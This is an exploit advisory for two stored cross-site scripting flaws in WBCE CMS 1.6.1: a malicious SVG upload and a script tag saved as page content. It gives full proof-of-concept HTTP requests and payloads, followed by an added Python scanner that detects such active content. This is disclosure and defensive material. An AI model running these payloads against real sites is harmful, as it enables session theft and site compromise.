Exploit Title: WBCE CMS 1.6.1 - Multiple Stored Cross-Site Scripting (XSS)
Version: 1.6.1
Bugs: XSS
Technology: PHP
Vendor URL: https://wbce-cms.org/
Software Link: https://github.com/wbce/wbce_cms/releases/tag/1.6.1
Date found: 03-05-2023
Author: Mirabbas Ağalarov
Tested on: Linux

2. Technical Details / POC
====================================================
### XSS-1 ###
Steps:
1. Go to Media (http://localhost/wbce_cms-1.6.1/wbce/admin/media/)
2. Upload a malicious SVG file

SVG file content ===
<?xml version="1.0" standalone="no"?>
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
  <script type="text/javascript">
    alert(document.location);
  </script>
</svg>
POC Request:
POST /wbce_cms-1.6.1/wbce/modules/elfinder/ef/php/connector.wbce.php HTTP/1.1
Host: localhost
Content-Length: 976
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
sec-ch-ua-platform: "Linux"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary5U4R3Pogl4Nubto
Accept: */*
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/wbce_cms-1.6.1/wbce/admin/media/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: Stelem___stickysidebarelement=...; phpsessid-6361-sid=nnjmhia5hkt0h6qi9lumt95t9u; wbcelastConnectjs=1683060167
Connection: close

------WebKitFormBoundary5U4R3Pogl4Nubto
Content-Disposition: form-data; name="reqid"

187DE34EA92AC
------WebKitFormBoundary5U4R3Pogl4Nubto
Content-Disposition: form-data; name="cmd"

upload
------WebKitFormBoundary5U4R3Pogl4Nubto
Content-Disposition: form-data; name="target"

l1_Lw
------WebKitFormBoundary5U4R3Pogl4Nubto
Content-Disposition: form-data; name="upload[]"; filename="svg_xss.svg"
Content-Type: image/svg+xml

<?xml version="1.0" standalone="no"?>
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
  <script type="text/javascript">
    alert(document.location);
  </script>
</svg>
------WebKitFormBoundary5U4R3Pogl4Nubto
Content-Disposition: form-data; name="mtime[]"

1683056102
------WebKitFormBoundary5U4R3Pogl4Nubto--
3. Open the uploaded SVG file (http://localhost/wbce_cms-1.6.1/wbce/media/svg_xss.svg); the script runs in the browser.

====================================================
### XSS-2 ###
1. Go to Pages (http://localhost/wbce_cms-1.6.1/wbce/admin/pages)
2. Add a page
3. Write <script>alert(4)</script> into the page source content (%3Cscript%3Ealert%284%29%3C%2Fscript%3E)
Payload: %3Cscript%3Ealert%284%29%3C%2Fscript%3E
POC Request:
POST /wbce_cms-1.6.1/wbce/modules/wysiwyg/save.php HTTP/1.1
Host: localhost
Content-Length: 143
Cache-Control: max-age=0
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/wbce_cms-1.6.1/wbce/admin/pages/pages/modify.php?page_id=4
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: Stelem___stickysidebarelement=...; phpsessid-6361-sid=nnjmhia5hkt0h6qi9lumt95t9u; wbcelastConnectjs=1683060475
Connection: close

page_id=4&section_id=4&formtoken=6071E516-6EA84938EA2E60B811895C9072C4416666AE07F&content4=%3Cscript%3Ealert%284%29%3C%2Fscript%3E&modify=Save
4. View the page: http://localhost/wbce_cms-1.6.1/wbce/pages/hello.php
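Added defensive example, not part of the advisory and not WBCE's code: a Python check that a media upload handler or a page-content save routine could apply to reject the active content used in both PoCs above (the SVG with an embedded script element, and the script element saved through the WYSIWYG editor). It goes beyond the two payloads on this page by also flagging on* event handlers and javascript: URLs in attributes; the tag/attribute lists, function names and sample inputs are assumptions, and the samples are constructed copies of the PoC payloads.

```python
"""Reject active content in uploaded SVG files and saved page content."""
from html.parser import HTMLParser

# Elements that run script or embed another document when the markup is
# rendered inline (served as image/svg+xml or text/html). Assumed list.
ACTIVE_TAGS = {"script", "foreignobject", "iframe", "object", "embed"}
# Attributes whose value is a URL; a javascript: scheme there runs code.
URL_ATTRS = {"href", "xlink:href", "src", "action", "formaction", "data"}


class ActiveContentScanner(HTMLParser):
    """Collects one finding per script-capable element or attribute."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):  # also reached for <tag .../>
        if tag in ACTIVE_TAGS:              # HTMLParser lowercases names
            self.findings.append(f"element <{tag}>")
        for attr, value in attrs:
            scheme = (value or "").strip().lower().split(":", 1)[0]
            if attr.startswith("on"):
                self.findings.append(f"event handler {attr} on <{tag}>")
            elif attr in URL_ATTRS and scheme == "javascript":
                self.findings.append(f"{attr} with javascript: URL on <{tag}>")


def find_active_content(markup: str) -> list[str]:
    scanner = ActiveContentScanner()
    scanner.feed(markup)
    scanner.close()
    return scanner.findings


def is_safe_upload(filename: str, content_type: str, body: bytes) -> bool:
    """Upload gate: SVG is accepted only when it carries no active content.
    Other types pass here; they still need their own magic-byte checks."""
    is_svg = filename.lower().endswith(".svg") or content_type == "image/svg+xml"
    return not is_svg or not find_active_content(body.decode("utf-8", "replace"))


# Constructed samples: copies of the two PoC payloads above, a benign icon,
# and an SVG that uses an event handler plus a javascript: URL instead.
SVG_POC = """<?xml version="1.0" standalone="no"?>
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">alert(document.location);</script>
</svg>"""
PAGE_CONTENT_POC = "<script>alert(4)</script>"
BENIGN_SVG = '<svg xmlns="http://www.w3.org/2000/svg"><circle r="4" fill="#ccc"/></svg>'
HANDLER_SVG = ('<svg xmlns="http://www.w3.org/2000/svg" onload="alert(1)">'
               '<a href="javascript:alert(2)">x</a></svg>')
```

Rejecting the file is only half of the fix: SVG that is stored anyway should be served with a Content-Disposition: attachment header or a restrictive CSP so that it never renders inline on the CMS origin.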